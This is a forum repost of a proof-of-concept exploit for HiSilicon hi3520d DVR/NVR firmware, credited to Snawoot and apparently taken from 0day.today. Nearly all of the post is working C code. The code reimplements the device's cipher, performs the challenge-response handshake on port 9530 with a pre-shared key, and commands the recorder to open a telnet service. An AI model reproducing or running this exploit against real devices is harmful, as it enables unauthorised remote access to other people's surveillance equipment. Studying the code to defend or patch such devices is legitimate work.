• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

HiSilicon DVR / NVR hi3520d固件-远程后门帐户攻击


This Wind

Recommended Posts

发布内容作者:Snawoot                                             漏洞危害等级:critlow_4.gif〔严重〕
 
# Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account <font></font>
# Exploit Author: Snawoot<font></font>
# Vendor Homepage: http://www.hisilicon.com<font></font>
# Product Link: http://www.hisilicon.com/en/Products<font></font>
# Version: hi3520d<font></font>
# Tested on: Linux<font></font>
# CVE: N/A<font></font>
# References: https://habr.com/en/post/486856/<font></font>
# References: https://github.com/Snawoot/hisilicon-dvr-telnet<font></font>
# References: https://github.com/tothi/pwn-hisilicon-dvr#summary<font></font>
<font></font>
# POC: <font></font>
#include <stdio.h><font></font>
#include <string.h><font></font>
#include <errno.h><font></font>
#include <netdb.h><font></font>
#include <sys/types.h><font></font>
#include <netinet/in.h><font></font>
#include <sys/socket.h><font></font>
#include <unistd.h><font></font>
<font></font>
typedef unsigned char byte;<font></font>
typedef unsigned int uint;<font></font>
<font></font>
byte state[2048] = {0};<font></font>
byte datum[] = {<font></font>
    0x20, 0x01, 0x02, 0x03, 0x04, 0x05, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09,<font></font>
    0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11,<font></font>
    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19,<font></font>
    0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1c, 0x1d, 0x1e, 0x1f, 0x20, 0x01,<font></font>
    0x0e, 0x04, 0x0d, 0x01, 0x02, 0x0f, 0x0b, 0x08, 0x03, 0x0a, 0x06, 0x0c,<font></font>
    0x05, 0x09, 0x00, 0x07, 0x00, 0x0f, 0x07, 0x04, 0x0e, 0x02, 0x0d, 0x01,<font></font>
    0x0a, 0x06, 0x0c, 0x0b, 0x09, 0x05, 0x03, 0x08, 0x04, 0x01, 0x0e, 0x08,<font></font>
    0x0d, 0x06, 0x02, 0x0b, 0x0f, 0x0c, 0x09, 0x07, 0x03, 0x0a, 0x05, 0x00,<font></font>
    0x0f, 0x0c, 0x08, 0x02, 0x04, 0x09, 0x01, 0x07, 0x05, 0x0b, 0x03, 0x0e,<font></font>
    0x0a, 0x00, 0x06, 0x0d, 0x0f, 0x01, 0x08, 0x0e, 0x06, 0x0b, 0x03, 0x04,<font></font>
    0x09, 0x07, 0x02, 0x0d, 0x0c, 0x00, 0x05, 0x0a, 0x03, 0x0d, 0x04, 0x07,<font></font>
    0x0f, 0x02, 0x08, 0x0e, 0x0c, 0x00, 0x01, 0x0a, 0x06, 0x09, 0x0b, 0x05,<font></font>
    0x00, 0x0e, 0x07, 0x0b, 0x0a, 0x04, 0x0d, 0x01, 0x05, 0x08, 0x0c, 0x06,<font></font>
    0x09, 0x03, 0x02, 0x0f, 0x0d, 0x08, 0x0a, 0x01, 0x03, 0x0f, 0x04, 0x02,<font></font>
    0x0b, 0x06, 0x07, 0x0c, 0x00, 0x05, 0x0e, 0x09, 0x0a, 0x00, 0x09, 0x0e,<font></font>
    0x06, 0x03, 0x0f, 0x05, 0x01, 0x0d, 0x0c, 0x07, 0x0b, 0x04, 0x02, 0x08,<font></font>
    0x0d, 0x07, 0x00, 0x09, 0x03, 0x04, 0x06, 0x0a, 0x02, 0x08, 0x05, 0x0e,<font></font>
    0x0c, 0x0b, 0x0f, 0x01, 0x0d, 0x06, 0x04, 0x09, 0x08, 0x0f, 0x03, 0x00,<font></font>
    0x0b, 0x01, 0x02, 0x0c, 0x05, 0x0a, 0x0e, 0x07, 0x01, 0x0a, 0x0d, 0x00,<font></font>
    0x06, 0x09, 0x08, 0x07, 0x04, 0x0f, 0x0e, 0x03, 0x0b, 0x05, 0x02, 0x0c,<font></font>
    0x07, 0x0d, 0x0e, 0x03, 0x00, 0x06, 0x09, 0x0a, 0x01, 0x02, 0x08, 0x05,<font></font>
    0x0b, 0x0c, 0x04, 0x0f, 0x0d, 0x08, 0x0b, 0x05, 0x06, 0x0f, 0x00, 0x03,<font></font>
    0x04, 0x07, 0x02, 0x0c, 0x01, 0x0a, 0x0e, 0x09, 0x0a, 0x06, 0x09, 0x00,<font></font>
    0x0c, 0x0b, 0x07, 0x0d, 0x0f, 0x01, 0x03, 0x0e, 0x05, 0x02, 0x08, 0x04,<font></font>
    0x03, 0x0f, 0x00, 0x06, 0x0a, 0x01, 0x0d, 0x08, 0x09, 0x04, 0x05, 0x0b,<font></font>
    0x0c, 0x07, 0x02, 0x0e, 0x02, 0x0c, 0x04, 0x01, 0x07, 0x0a, 0x0b, 0x06,<font></font>
    0x08, 0x05, 0x03, 0x0f, 0x0d, 0x00, 0x0e, 0x09, 0x0e, 0x0b, 0x02, 0x0c,<font></font>
    0x04, 0x07, 0x0d, 0x01, 0x05, 0x00, 0x0f, 0x0a, 0x03, 0x09, 0x08, 0x06,<font></font>
    0x04, 0x02, 0x01, 0x0b, 0x0a, 0x0d, 0x07, 0x08, 0x0f, 0x09, 0x0c, 0x05,<font></font>
    0x06, 0x03, 0x00, 0x0e, 0x0b, 0x08, 0x0c, 0x07, 0x01, 0x0e, 0x02, 0x0d,<font></font>
    0x06, 0x0f, 0x00, 0x09, 0x0a, 0x04, 0x05, 0x03, 0x0c, 0x01, 0x0a, 0x0f,<font></font>
    0x09, 0x02, 0x06, 0x08, 0x00, 0x0d, 0x03, 0x04, 0x0e, 0x07, 0x05, 0x0b,<font></font>
    0x0a, 0x0f, 0x04, 0x02, 0x07, 0x0c, 0x09, 0x05, 0x06, 0x01, 0x0d, 0x0e,<font></font>
    0x00, 0x0b, 0x03, 0x08, 0x09, 0x0e, 0x0f, 0x05, 0x02, 0x08, 0x0c, 0x03,<font></font>
    0x07, 0x00, 0x04, 0x0a, 0x01, 0x0d, 0x0b, 0x06, 0x04, 0x03, 0x02, 0x0c,<font></font>
    0x09, 0x05, 0x0f, 0x0a, 0x0b, 0x0e, 0x01, 0x07, 0x06, 0x00, 0x08, 0x0d,<font></font>
    0x04, 0x0b, 0x02, 0x0e, 0x0f, 0x00, 0x08, 0x0d, 0x03, 0x0c, 0x09, 0x07,<font></font>
    0x05, 0x0a, 0x06, 0x01, 0x0d, 0x00, 0x0b, 0x07, 0x04, 0x09, 0x01, 0x0a,<font></font>
    0x0e, 0x03, 0x05, 0x0c, 0x02, 0x0f, 0x08, 0x06, 0x01, 0x04, 0x0b, 0x0d,<font></font>
    0x0c, 0x03, 0x07, 0x0e, 0x0a, 0x0f, 0x06, 0x08, 0x00, 0x05, 0x09, 0x02,<font></font>
    0x06, 0x0b, 0x0d, 0x08, 0x01, 0x04, 0x0a, 0x07, 0x09, 0x05, 0x00, 0x0f,<font></font>
    0x0e, 0x02, 0x03, 0x0c, 0x0d, 0x02, 0x08, 0x04, 0x06, 0x0f, 0x0b, 0x01,<font></font>
    0x0a, 0x09, 0x03, 0x0e, 0x05, 0x00, 0x0c, 0x07, 0x01, 0x0f, 0x0d, 0x08,<font></font>
    0x0a, 0x03, 0x07, 0x04, 0x0c, 0x05, 0x06, 0x0b, 0x00, 0x0e, 0x09, 0x02,<font></font>
    0x07, 0x0b, 0x04, 0x01, 0x09, 0x0c, 0x0e, 0x02, 0x00, 0x06, 0x0a, 0x0d,<font></font>
    0x0f, 0x03, 0x05, 0x08, 0x02, 0x01, 0x0e, 0x07, 0x04, 0x0a, 0x08, 0x0d,<font></font>
    0x0f, 0x0c, 0x09, 0x00, 0x03, 0x05, 0x06, 0x0b, 0x10, 0x07, 0x14, 0x15,<font></font>
    0x1d, 0x0c, 0x1c, 0x11, 0x01, 0x0f, 0x17, 0x1a, 0x05, 0x12, 0x1f, 0x0a,<font></font>
    0x02, 0x08, 0x18, 0x0e, 0x20, 0x1b, 0x03, 0x09, 0x13, 0x0d, 0x1e, 0x06,<font></font>
    0x16, 0x0b, 0x04, 0x19, 0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02,<font></font>
    0x3c, 0x34, 0x2c, 0x24, 0x1c, 0x14, 0x0c, 0x04, 0x3e, 0x36, 0x2e, 0x26,<font></font>
    0x1e, 0x16, 0x0e, 0x06, 0x40, 0x38, 0x30, 0x28, 0x20, 0x18, 0x10, 0x08,<font></font>
    0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01, 0x3b, 0x33, 0x2b, 0x23,<font></font>
    0x1b, 0x13, 0x0b, 0x03, 0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05,<font></font>
    0x3f, 0x37, 0x2f, 0x27, 0x1f, 0x17, 0x0f, 0x07, 0xf4, 0x63, 0x01, 0x00,<font></font>
    0x28, 0x08, 0x30, 0x10, 0x38, 0x18, 0x40, 0x20, 0x27, 0x07, 0x2f, 0x0f,<font></font>
    0x37, 0x17, 0x3f, 0x1f, 0x26, 0x06, 0x2e, 0x0e, 0x36, 0x16, 0x3e, 0x1e,<font></font>
    0x25, 0x05, 0x2d, 0x0d, 0x35, 0x15, 0x3d, 0x1d, 0x24, 0x04, 0x2c, 0x0c,<font></font>
    0x34, 0x14, 0x3c, 0x1c, 0x23, 0x03, 0x2b, 0x0b, 0x33, 0x13, 0x3b, 0x1b,<font></font>
    0x22, 0x02, 0x2a, 0x0a, 0x32, 0x12, 0x3a, 0x1a, 0x21, 0x01, 0x29, 0x09,<font></font>
    0x31, 0x11, 0x39, 0x19, 0x39, 0x31, 0x29, 0x21, 0x19, 0x11, 0x09, 0x01,<font></font>
    0x3a, 0x32, 0x2a, 0x22, 0x1a, 0x12, 0x0a, 0x02, 0x3b, 0x33, 0x2b, 0x23,<font></font>
    0x1b, 0x13, 0x0b, 0x03, 0x3c, 0x34, 0x2c, 0x24, 0x3f, 0x37, 0x2f, 0x27,<font></font>
    0x1f, 0x17, 0x0f, 0x07, 0x3e, 0x36, 0x2e, 0x26, 0x1e, 0x16, 0x0e, 0x06,<font></font>
    0x3d, 0x35, 0x2d, 0x25, 0x1d, 0x15, 0x0d, 0x05, 0x1c, 0x14, 0x0c, 0x04,<font></font>
    0x50, 0x64, 0x01, 0x00, 0x01, 0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02,<font></font>
    0x01, 0x02, 0x02, 0x02, 0x02, 0x02, 0x02, 0x01, 0x0e, 0x11, 0x0b, 0x18,<font></font>
    0x01, 0x05, 0x03, 0x1c, 0x0f, 0x06, 0x15, 0x0a, 0x17, 0x13, 0x0c, 0x04,<font></font>
    0x1a, 0x08, 0x10, 0x07, 0x1b, 0x14, 0x0d, 0x02, 0x29, 0x34, 0x1f, 0x25,<font></font>
    0x2f, 0x37, 0x1e, 0x28, 0x33, 0x2d, 0x21, 0x30, 0x2c, 0x31, 0x27, 0x38,<font></font>
    0x22, 0x35, 0x2e, 0x2a, 0x32, 0x24, 0x1d, 0x20<font></font>
};<font></font>
<font></font>
void init_cipher_offset_vector(byte *dst,byte *src,int size)<font></font>
<font></font>
{<font></font>
  int i;<font></font>
  <font></font>
  i = 0;<font></font>
  while (i < size) {<font></font>
    dst[i] = (byte)((int)(uint)src[i >> 3] >> (i & 7U)) & 1;<font></font>
    i = i + 1;<font></font>
  }<font></font>
  return;<font></font>
}<font></font>
<font></font>
void apply_cipher_offset_vector(byte *dst,byte *src,byte *offset_vector,size_t size)<font></font>
<font></font>
{<font></font>
  int i;<font></font>
  <font></font>
  i = 0;<font></font>
  while (i < (int)size) {<font></font>
    state[i] = src[(uint)offset_vector[i] - 1];<font></font>
    i = i + 1;<font></font>
  }<font></font>
  memcpy(dst,state,size);<font></font>
  return;<font></font>
}<font></font>
<font></font>
void cipher_memcpy_shuffle(void *dst,size_t size)<font></font>
<font></font>
{<font></font>
  memcpy(state,dst,size);<font></font>
  memcpy(dst,(void *)(dst + size),0x1c - size);<font></font>
  memcpy((void *)(dst + (0x1c - size)),state,size);<font></font>
  return;<font></font>
}<font></font>
<font></font>
void init_cipher_state(void *dst,void *src)<font></font>
<font></font>
{<font></font>
  byte current_byte;<font></font>
  int i;<font></font>
  <font></font>
  init_cipher_offset_vector(state + 0x190,(byte *)src,0x40);<font></font>
  apply_cipher_offset_vector(state + 0x190,state + 0x190,datum + 0x2d4,0x38);<font></font>
  i = 0;<font></font>
  do {<font></font>
    current_byte = (datum + 0x310)[i];<font></font>
    i = i + 1;<font></font>
    cipher_memcpy_shuffle(state + 0x190,(uint)current_byte);<font></font>
    cipher_memcpy_shuffle(state + 0x190 + 0x1c,(uint)current_byte);<font></font>
    apply_cipher_offset_vector((byte *)dst,state + 0x190,datum + 0x320,0x30);<font></font>
    dst = (byte *)dst + 0x30;<font></font>
  } while (i != 0x10);<font></font>
  return;<font></font>
}<font></font>
<font></font>
void cipher_xor(byte *data,byte *key,int size)<font></font>
<font></font>
{<font></font>
  int i;<font></font>
<font></font>
  i = 0;<font></font>
  while (i < size) {<font></font>
    data[i] = key[i] ^ data[i];<font></font>
    i = i + 1;<font></font>
  }<font></font>
  return;<font></font>
}<font></font>
<font></font>
void prepare_key(void *key,size_t key_size)<font></font>
<font></font>
{<font></font>
  size_t __n;<font></font>
<font></font>
  memset(state + 0x1d0,0,0x10);<font></font>
  __n = key_size;<font></font>
  if (0xf < (int)key_size) {<font></font>
    __n = 0x10;<font></font>
  }<font></font>
  memcpy(state + 0x1d0,key,__n);<font></font>
  init_cipher_state(state + 0x1e0,state + 0x1d0);<font></font>
  if (8 < (int)key_size) {<font></font>
    init_cipher_state(state + 0x4e0,state + 0x1d8);<font></font>
  }<font></font>
  *(state + 0x7e0) = 8 < (int)key_size; // !!!! recheck size<font></font>
  return;<font></font>
}<font></font>
<font></font>
void cipher_shuffle(byte *dst,byte *src)<font></font>
<font></font>
{<font></font>
  byte *caretPtr;<font></font>
  int iVar1;<font></font>
  byte *ptr;<font></font>
  int i;<font></font>
  <font></font>
  apply_cipher_offset_vector(state + 0x100,dst,datum,0x30);<font></font>
  cipher_xor(state + 0x100,src,0x30);<font></font>
  ptr = state + 0x100;<font></font>
  i = 0;<font></font>
  do {<font></font>
    iVar1 = i + (uint)ptr[5] + (uint)*ptr * 2;<font></font>
    caretPtr = dst + i;<font></font>
    i = i + 4;<font></font>
    init_cipher_offset_vector<font></font>
              (caretPtr,datum + 0x30 +<font></font>
                        (uint)ptr[2] * 4 + (uint)ptr[1] * 8 + (uint)ptr[4] + (uint)ptr[3] * 2 +<font></font>
                        iVar1 * 0x10,4);<font></font>
    ptr = ptr + 6;<font></font>
  } while (i != 0x20);<font></font>
  apply_cipher_offset_vector(dst,dst,datum + 0x230,0x20);<font></font>
  return;<font></font>
}<font></font>
<font></font>
void cipher_box(byte *result,byte *data,byte *offset_vector,int direction)<font></font>
<font></font>
{<font></font>
  uint i;<font></font>
  byte *backward_ov_ptr;<font></font>
  byte *forward_ov_ptr;<font></font>
  int iVar3;<font></font>
<font></font>
  init_cipher_offset_vector(state + 0x130,data,0x40);<font></font>
  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x250,0x40);<font></font>
  if (direction == 0) {<font></font>
    forward_ov_ptr = offset_vector + 0x300;<font></font>
    do {<font></font>
      memcpy(state + 0x170,state + 0x150,0x20);<font></font>
      cipher_shuffle(state + 0x150,offset_vector);<font></font>
      cipher_xor(state + 0x150,state + 0x130,0x20);<font></font>
      memcpy(state + 0x130, state + 0x170, 0x20);<font></font>
      offset_vector = offset_vector + 0x30;<font></font>
    } while (offset_vector != forward_ov_ptr);<font></font>
  }<font></font>
  else {<font></font>
    backward_ov_ptr = offset_vector + 0x2d0;<font></font>
    do {<font></font>
      memcpy(state + 0x170,state + 0x130,0x20);<font></font>
      cipher_shuffle(state + 0x130,backward_ov_ptr);<font></font>
      cipher_xor(state + 0x130,state + 0x150,0x20);<font></font>
      backward_ov_ptr -= 0x30;<font></font>
      memcpy(state + 0x150,state + 0x170,0x20);<font></font>
    } while (backward_ov_ptr != offset_vector + -0x30);<font></font>
  }<font></font>
  apply_cipher_offset_vector(state + 0x130,state + 0x130,datum + 0x294,0x40);<font></font>
  memset(result,0,8);<font></font>
  i = 0;<font></font>
  do {<font></font>
    result[i >> 3] = result[i >> 3] | *(char *)(state + 0x130 + i) << (i & 7);<font></font>
    i = i + 1;<font></font>
  } while (i != 0x40);<font></font>
  return;<font></font>
}<font></font>
<font></font>
int decrypt(char *result,char *data,uint data_len,char *key,uint key_len)<font></font>
<font></font>
{<font></font>
  uint short_key_iter;<font></font>
  int curBlockNumber;<font></font>
  int blockCount;<font></font>
<font></font>
  if (((result != (char *)0x0 && data != (char *)0x0) && (curBlockNumber = 0, key != (char *)0x0))<font></font>
     && ((data_len + 7 & 0xfffffff8) != 0)) {<font></font>
    prepare_key(key,key_len);<font></font>
    blockCount = (int)(data_len + 7) >> 3;<font></font>
    short_key_iter = *(state + 0x7e0);<font></font>
    if (*(state + 0x7e0) == 0) {<font></font>
      while ((int)short_key_iter < blockCount) {<font></font>
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);<font></font>
        short_key_iter = short_key_iter + 1;<font></font>
        result = (char *)((byte *)result + 8);<font></font>
        data = (char *)((byte *)data + 8);<font></font>
      }<font></font>
    }<font></font>
    else {<font></font>
      while (curBlockNumber < blockCount) {<font></font>
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,1);<font></font>
        cipher_box((byte *)result,(byte *)result,state + 0x4e0,0);<font></font>
        cipher_box((byte *)result,(byte *)result,state + 0x1e0,1);<font></font>
        curBlockNumber = curBlockNumber + 1;<font></font>
        result = (char *)((byte *)result + 8);<font></font>
        data = (char *)((byte *)data + 8);<font></font>
      }<font></font>
    }<font></font>
    return 0;<font></font>
  }<font></font>
  return -1;<font></font>
}<font></font>
<font></font>
int encrypt(char *result,char *data,uint data_len,char *key,uint key_size)<font></font>
<font></font>
{<font></font>
  uint uVar2;<font></font>
  int currentBlockNumber;<font></font>
  int blocksCount;<font></font>
  <font></font>
  if (((result != (char *)0x0 && data != (char *)0x0) &&<font></font>
      (currentBlockNumber = 0, key != (char *)0x0)) && ((data_len + 7 & 0xfffffff8) != 0)) {<font></font>
    prepare_key(key,key_size);<font></font>
    blocksCount = (int)(data_len + 7) >> 3;<font></font>
    uVar2 = *(state + 0x7e0);<font></font>
    if (*(state + 0x7e0) == 0) {<font></font>
      while ((int)uVar2 < blocksCount) {<font></font>
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);<font></font>
        uVar2 = uVar2 + 1;<font></font>
        result = (char *)((byte *)result + 8);<font></font>
        data = (char *)((byte *)data + 8);<font></font>
      }<font></font>
    }<font></font>
    else {<font></font>
      while (currentBlockNumber < blocksCount) {<font></font>
        cipher_box((byte *)result,(byte *)data,state + 0x1e0,0);<font></font>
        cipher_box((byte *)result,(byte *)result,state + 0x4e0,1);<font></font>
        cipher_box((byte *)result,(byte *)result,state + 0x1e0,0);<font></font>
        currentBlockNumber = currentBlockNumber + 1;<font></font>
        result = (char *)((byte *)result + 8);<font></font>
        data = (char *)((byte *)data + 8);<font></font>
      }<font></font>
    }<font></font>
    return 0;<font></font>
  }<font></font>
  return -1;<font></font>
}<font></font>
<font></font>
void tohex(unsigned char * in, size_t insz, char * out, size_t outsz)<font></font>
{<font></font>
    unsigned char * pin = in;<font></font>
    const char * hex = "0123456789ABCDEF";<font></font>
    char * pout = out;<font></font>
    for(; pin < in+insz; pout +=3, pin++){<font></font>
        pout[0] = hex[(*pin>>4) & 0xF];<font></font>
        pout[1] = hex[ *pin     & 0xF];<font></font>
        pout[2] = ':';<font></font>
        if (pout + 3 - out > outsz){<font></font>
            /* Better to truncate output string than overflow buffer */<font></font>
            /* it would be still better to either return a status */<font></font>
            /* or ensure the target buffer is large enough and it never happen */<font></font>
            break;<font></font>
        }<font></font>
    }<font></font>
    pout[-1] = 0;<font></font>
}<font></font>
<font></font>
char netbuf[4096];<font></font>
<font></font>
#define PADDED(X) (((X + 7) / 8) * 8)<font></font>
#define PORT 9530<font></font>
#define BUFSIZE sizeof(netbuf)<font></font>
#define CMD_FIRST "OpenTelnet:OpenOnce"<font></font>
#define CHALLENGE_PROLOGUE "randNum:"<font></font>
#define VERIFY_OK "verify:OK"<font></font>
#define CMD_FINAL "CMD:"<font></font>
#define FINAL_PAYLOAD "Telnet:OpenOnce"<font></font>
#define OPEN_OK "Open:OK"<font></font>
<font></font>
ssize_t send_str(int sockfd, char *str, size_t len) {<font></font>
    if (len > 0xFE) {<font></font>
        return -1;<font></font>
    }<font></font>
    char buf[len+1];<font></font>
    buf[0] = len + 1;<font></font>
    memcpy(buf + 1, str, len);<font></font>
    return send(sockfd, buf, len + 1, 0);<font></font>
}<font></font>
<font></font>
int main(int argc, char* argv[]) {<font></font>
    int sockfd, numbytes;<font></font>
    struct hostent *he;<font></font>
    struct sockaddr_in their_addr;<font></font>
<font></font>
    if (argc != 3) {<font></font>
        fprintf(stderr, "Usage: %s <host> <PSK>\n", argv[0]);<font></font>
        return 2;<font></font>
    }<font></font>
<font></font>
    if ((he=gethostbyname(argv[1])) == NULL) {  /* get the host info */<font></font>
        herror("gethostbyname");<font></font>
        return 1;<font></font>
    }<font></font>
<font></font>
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {<font></font>
        perror("socket");<font></font>
        return 1;<font></font>
    }<font></font>
<font></font>
    their_addr.sin_family = AF_INET;      /* host byte order */<font></font>
    their_addr.sin_port = htons(PORT);    /* short, network byte order */<font></font>
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);<font></font>
    bzero(&(their_addr.sin_zero), 8);     /* zero the rest of the struct */<font></font>
<font></font>
    if (connect(sockfd, (struct sockaddr *)&their_addr, \<font></font>
                                              sizeof(struct sockaddr)) == -1) {<font></font>
        perror("connect");<font></font>
        return 1;<font></font>
    }<font></font>
    if (send_str(sockfd, CMD_FIRST, sizeof(CMD_FIRST)) == -1) {<font></font>
        perror("send");<font></font>
        return 1;<font></font>
    }<font></font>
    printf("Sent %s command.\n", CMD_FIRST);<font></font>
    bzero(netbuf, BUFSIZE);<font></font>
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {<font></font>
        perror("recv");<font></font>
        return 1;<font></font>
    }<font></font>
    puts(netbuf);<font></font>
    if (memcmp(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1) != 0) {<font></font>
        fprintf(stderr, "No challenge received.\n");<font></font>
        return 3;<font></font>
    }<font></font>
<font></font>
    char *seed = netbuf + sizeof(CHALLENGE_PROLOGUE) - 1;<font></font>
    char challengeStr[strlen(seed) + strlen(argv[2]) + 1];<font></font>
    size_t challengeLen = sprintf(challengeStr, "%s%s", seed, argv[2]);<font></font>
    printf("challenge=%s\n", challengeStr);<font></font>
<font></font>
    char encryptedRandomSeed[PADDED(challengeLen)];<font></font>
    encrypt(encryptedRandomSeed, seed, strlen(seed), challengeStr, challengeLen);<font></font>
    memcpy(netbuf, CHALLENGE_PROLOGUE, sizeof(CHALLENGE_PROLOGUE) - 1);<font></font>
    memcpy(netbuf + sizeof(CHALLENGE_PROLOGUE) - 1, encryptedRandomSeed, PADDED(challengeLen));<font></font>
    if (send_str(sockfd, netbuf, sizeof(CHALLENGE_PROLOGUE) - 1 + PADDED(challengeLen)) == -1) {<font></font>
        perror("send");<font></font>
        return 1;<font></font>
    }<font></font>
    bzero(netbuf, BUFSIZE);<font></font>
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {<font></font>
        perror("recv");<font></font>
        return 1;<font></font>
    }<font></font>
    puts(netbuf);<font></font>
    if (memcmp(netbuf, VERIFY_OK, sizeof(VERIFY_OK) - 1) != 0) {<font></font>
        fprintf(stderr, "Verification failed.\n");<font></font>
        return 4;<font></font>
    }<font></font>
    char encryptedFinal[PADDED(sizeof(FINAL_PAYLOAD))];<font></font>
    encrypt(encryptedFinal, FINAL_PAYLOAD, sizeof(FINAL_PAYLOAD), challengeStr, challengeLen);<font></font>
    memcpy(netbuf, CMD_FINAL, sizeof(CMD_FINAL) - 1);<font></font>
    memcpy(netbuf + sizeof(CMD_FINAL) - 1, encryptedFinal, sizeof(encryptedFinal));<font></font>
    if (send_str(sockfd, netbuf, sizeof(CMD_FINAL) - 1 + sizeof(encryptedFinal)) == -1) {<font></font>
        perror("send");<font></font>
        return 1;<font></font>
    }<font></font>
    bzero(netbuf, BUFSIZE);<font></font>
    if ((numbytes=recv(sockfd, netbuf, BUFSIZE - 1, 0)) == -1) {<font></font>
        perror("recv");<font></font>
        return 1;<font></font>
    }<font></font>
    puts(netbuf);<font></font>
    if (memcmp(netbuf, OPEN_OK, sizeof(OPEN_OK) - 1)) {<font></font>
        fprintf(stderr, "Open failed.\n");<font></font>
        return 5;<font></font>
    }<font></font>
    <font></font>
    return 0;<font></font>
}<font></font>
<font></font>
#<font></font>
<font></font>
#  0day.today [2020-03-20]  #

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now